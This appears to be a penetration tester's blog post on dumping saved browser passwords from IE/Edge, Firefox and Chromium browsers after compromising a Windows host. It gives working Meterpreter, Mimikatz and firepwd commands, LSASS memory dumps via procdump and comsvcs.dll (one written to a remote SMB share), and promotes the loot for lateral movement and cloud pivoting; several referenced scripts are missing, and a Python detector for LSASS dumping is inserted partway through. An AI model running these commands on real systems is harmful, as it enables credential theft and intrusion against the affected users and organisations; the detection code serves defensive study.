Stealing Saved Browser Passwords: Your New Favorite Post-Exploitation Technique

Overview

People reuse passwords, and most people will never stop doing so, despite how frequently they are reminded not to. As every pentester knows, password reuse is commonplace, and we love few things more than finding caches of passwords!

  • Firefox
  • Chrome/Brave/Opera

Stealing passwords saved in IE/Edge

Note: I have not tested this on newer versions of Edge. Older versions use the credential vault (like IE); newer ones sync saved passwords to Microsoft's servers if you're logged into a Microsoft account. It's still worth checking either way.

Requirements

To dump creds from IE and old versions of Edge, you need one of the following:

  • NT Authority\System permissions

Dumping creds with PowerShell

You can use the following PowerShell commands to list the saved login, password, and URLs that are stored in your user’s credential vault:

Dumping creds from an NT Authority\System shell

You have a couple of options for this attack if you’re running in a high-integrity shell. If you happen to be running Meterpreter, you can use the following commands to impersonate a user:

# Meterpreter: impersonate the target user's token, then drop to a shell
load incognito
list tokens -u
impersonate_token <SOME_TOKEN>
shell

# Mimikatz, run under the impersonated token
vault::cred
vault::list

# Mimikatz, offline against a memory dump
sekurlsa::minidump lsass.dmp # load the memory dump
vault::cred
vault::list

Stealing Passwords saved in Firefox

How it works: depending on the version, Firefox will store logins and passwords in the following files:

  • Firefox >=32 (key3.db, logins.json)
  • Firefox >=58.0.2 (key4.db, logins.json)
  • Firefox >=75.0 (key4.db, which now derives its key with SHA-1 + PBKDF2-SHA256 and encrypts with AES-256-CBC; logins.json)
  • at least Thunderbird 68.7.0, likely other versions

Grabbing the key and login files

The default file path that these files are stored in is predictable, but it does contain a random string, so grabbing these files isn’t super easy to script out:

Using firepwd to decrypt logins

The tool that I use to decrypt these files is called firepwd. It's pretty easy to set up; you just need Python 3 and pip:

python3 -m pip install --upgrade pip
cd firepwd
pip3 install -r requirements.txt
python3 firepwd.py # detect files in the current directory
python3 firepwd.py -d alternative_directory/ # trailing "/" required

Stealing Passwords Saved in Chrome/Brave/Opera

Chrome, Brave, and Opera are all built on Chromium, so they work more or less the same under the hood. As a result, they all store passwords in more or less the same way.

Requirements

One of the following:

  • Mimikatz
  • Administrator access or NT Authority\System access

Caveat

The bad news: Chrome et al. use the Win32 DPAPI (specifically, CryptProtectData and CryptUnprotectData) to protect login passwords. This can make it somewhat annoying to decrypt these passwords since any tooling that you’re using needs to be able to consume the Win32 API. That means you’re probably looking at PowerShell, C, C#, or Rust (which supports the Win32 API as of a few weeks ago), and you’re most likely not going to be able to perform this attack offline on a Linux host — the API is transparent and its inner workings are not well-documented.

Important Files

You need the following files from the user’s profile:

Using PowerShell to dump passwords and cookies

Props to @0gtweet for this method; it's a lot simpler than the Mimikatz method I used before (covered in the next section). You're going to need a copy of System.Data.SQLite.dll for this tool, and you'll need to modify the PowerShell script to include the relative path to it. Make sure to read my addendum below this gist before running it!

Using Mimikatz to dump passwords and cookies

This attack can be performed online or offline, but if you're doing it offline you need to dump lsass.exe, which requires NT Authority\System privileges. It may or may not require System privileges to perform the attack online (I always do it offline so that I can just use procdump on the target instead of dealing with sneaking Mimikatz past antivirus).

# Option 1: procdump with the PID of lsass rather than the image name
tasklist /fi "Imagename eq lsass.exe"
procdump -accepteula -ma PID_of_lsass dumpfile.dmp

# Option 2: PowerShell and rundll32 (comsvcs.dll MiniDump)
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id C:\users\public\dump.dmp full

# ... or write the dump straight to an SMB share
net use X: \\MY_SMB_SERVER\MY_SHARE\
powershell -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id X:\lsassdump.dmp full

# Mimikatz: load the dump, then decrypt the Chrome files
sekurlsa::minidump lsassdump.dmp
dpapi::chrome /in:"C:/path/to/login/data" /unprotect
dpapi::chrome /in:"C:/path/to/cookies" /unprotect

# Or list the DPAPI master keys cached in the dump ...
sekurlsa::dpapi
[000000000n]
* GUID : {$GUID}
* Time : $TIME
* MasterKey : $LONG_MASTER_KEY
* sha1(key) : $SHA1_KEY

# ... and pass the sha1(key) of the matching master key explicitly
dpapi::chrome /in:"C:/path/to/login/data" /masterkey:SHA1_KEY_HERE
dpapi::chrome /in:"C:/path/to/cookies" /masterkey:SHA1_KEY_HERE
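From the defender's side, both LSASS-dumping variants above leave a distinctive process command line. The following Python is an added example (not from the original post): it flags process-creation events matching procdump -ma against lsass and rundll32 comsvcs.dll MiniDump, correlating procdump's numeric target with the host's lsass PID because the post deliberately dumps by PID rather than by image name. The event tuples and the lsass PID table are constructed, and the field layout is an assumption rather than any particular SIEM's schema.

```python
import re

# Constructed sample process-creation events (host, image, command line), in the
# shape of Sysmon Event ID 1 / Security 4688 fields. Not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", r"C:\tools\procdump.exe",
     "procdump -accepteula -ma 712 dumpfile.dmp"),
    ("ws01", r"C:\Windows\System32\rundll32.exe",
     r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 712 X:\lsassdump.dmp full"),
    ("ws02", r"C:\Windows\System32\rundll32.exe",
     "rundll32.exe shell32.dll,Control_RunDLL"),          # benign rundll32 use
    ("ws03", r"C:\tools\procdump.exe",
     r"procdump -accepteula -ma 4120 C:\temp\app.dmp"),  # dumping a non-lsass PID
]
# Constructed: PID of lsass.exe on each host, as a SIEM would learn it from the
# lsass process-creation event at boot. Needed because the post dumps by PID.
LSASS_PIDS = {"ws01": 712, "ws03": 668}

COMSVCS_MINIDUMP = re.compile(r"comsvcs\.dll\b.*\bminidump\b", re.IGNORECASE)
PROCDUMP_TARGET = re.compile(r"\bprocdump\b.*?\s-ma\s+(\S+)", re.IGNORECASE)


def classify(host, cmdline, lsass_pids):
    """Return a reason string if the command line dumps LSASS, else None."""
    if COMSVCS_MINIDUMP.search(cmdline):
        return "rundll32 comsvcs.dll MiniDump"
    m = PROCDUMP_TARGET.search(cmdline)
    if m:
        target = m.group(1).lower()
        if target in ("lsass", "lsass.exe"):
            return "procdump -ma lsass (by name)"
        # Name matching alone misses the PID form used in the post.
        if target.isdigit() and int(target) == lsass_pids.get(host):
            return "procdump -ma lsass (by PID)"
    return None


def detect(events, lsass_pids):
    """Return (host, image, reason) for every event that dumps LSASS."""
    hits = []
    for host, image, cmdline in events:
        reason = classify(host, cmdline, lsass_pids)
        if reason:
            hits.append((host, image, reason))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS, LSASS_PIDS):
        print(hit)
```

Writing the dump to an SMB share, as in the last variant above, changes only the output path, so the same rule still fires.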

Conclusion

In this post, I’ve covered how to dump saved browser credentials from IE, Edge, Firefox, Chrome, Opera, and Brave. This is a great tactic for moving laterally across various domain and intranet web applications, and even can result in the ability to pivot into cloud environments and services (AWS/Azure/O365 credentials, anyone?). Questions or comments? Let me know in the comments section below, or ping me on twitter!

Student, hacker, OSCP. My other computer is your computer.